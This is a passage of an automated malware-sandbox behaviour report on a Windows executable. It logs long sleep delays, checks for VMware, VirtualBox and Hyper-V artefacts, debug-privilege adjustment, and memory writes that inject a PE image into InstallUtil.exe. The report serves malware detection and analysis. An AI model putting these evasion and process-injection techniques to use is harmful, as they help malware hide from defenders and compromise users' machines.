                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99532s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99407s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -98938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -98813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99774s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99433s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99323s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99219s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -98999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exe TID: 4544Thread sleep time: -98874s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -100000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21848Thread sleep count: 2649 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99875s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21848Thread sleep count: 7168 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99765s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99656s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99546s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99437s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99328s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99218s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99109s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -99000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98890s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98781s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98671s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98562s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98440s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98312s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98203s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -98093s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -97984s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -97874s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -97756s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -97609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -97500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -97390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999822s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999717s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999500s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119999046s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998828s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998609s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998499s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119998046s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997937s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997827s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997718s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997608s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997499s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997390s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997265s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 21940Thread sleep time: -119997156s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99891Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99766Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99657Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99532Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99407Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99297Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99188Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99063Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 98938Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 98813Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99890Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99774Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99546Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99433Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99323Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99219Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 98999Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeThread delayed: delay time: 98874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99218Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98671Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98562Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98440Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98093Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97874Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97756Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999822Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999717Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999500Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119999046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998609Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998156Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119998046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997937Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997827Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997718Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997608Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997499Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997390Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997265Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 119997156Jump to behavior
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2295238294.00000119A7739000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!--Blazor:{"sequence":0,"type":"server","prerenderId":"aa1a575cbec548a7be2c9454bf9c5c8c","descriptor":"CfDJ8F35l7Q5115HrKaUravmtosan6tHm30UpUjAejuIK211/3t2Fg2pGam0A5Cie35xqWJvVnZ5BQKiPlNa94nIv/HAk21iW3buPqV8EYBssGFt8naL64Qv1t0boVf3uBevZM9jX/yxwDnXvtkq/X4LU4EtEtXNL/PPau4/\u002Bl8rP\u002BWqbNH\u002Bhghe5Z7IlR7HPqsV9A6VE\u002B3ZBNcdYy9W/HoU8TFOejFaeWgQrMFv8kz8U0z/FSMo2W49amDC6fpH2eP2klTAqApEmesieSfkHvxec2qWDdJWjbBt6I1KyFI/5NHutcBcGcdnWYCCBuGtTbQFazhFKr4q8bNJrdCrUWi9ylBdFQzDVW1Halb\u002BXb1\u002B4HgfsDg59HcFGmZ61T539BjEzJvqPkn2vIOEdZQC\u002B7K/SvbdnX6IxnEzb0j8e0xgb1dp"}--><title>65d7a62047719422e5d0b85e</title><!--Blazor:{"prerenderId":"aa1a575cbec548a7be2c9454bf9c5c8c"}-->
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2436168207.00000119AC6B7000.00000004.00000020.00020000.00000000.sdmp, n1KVzXM8Wk.exe, 00000000.00000002.2449218733.00000119AE0A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2078804365.00000119920F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWppk
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: n1KVzXM8Wk.exe, 00000000.00000002.2081033615.0000011995209000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                    Source: InstallUtil.exe, 00000005.00000002.2985158869.00000000067B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: n1KVzXM8Wk.exe, GetOrCreateEventHandlegetNativeErrorCode.csReference to suspicious API methods: RuntimeHelpers.GetObjectValue(VirtualProtect(IEnumerablegetTwoDigitYearMax, WriteAsyncInternald64bytes, getHighMemoryLoadThresholdBytesAssociates, out TargetTypeNameChar8))
                    Source: n1KVzXM8Wk.exe, GetOrCreateEventHandlegetNativeErrorCode.csReference to suspicious API methods: RuntimeHelpers.GetObjectValue(GetProcAddress((IntPtr)Int16BitsToHalfPrint, setAccessIsLittleEndian))
                    Source: 0.2.n1KVzXM8Wk.exe.119a41201a0.1.raw.unpack, oZQpaCyO4.csReference to suspicious API methods: sHbn6juxSv.OpenProcess(ZHKsyD.DuplicateHandle, bInheritHandle: true, (uint)gmSjiIkP2.ProcessID)
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43C000Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11EA008Jump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exeJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Users\user\Desktop\n1KVzXM8Wk.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\n1KVzXM8Wk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
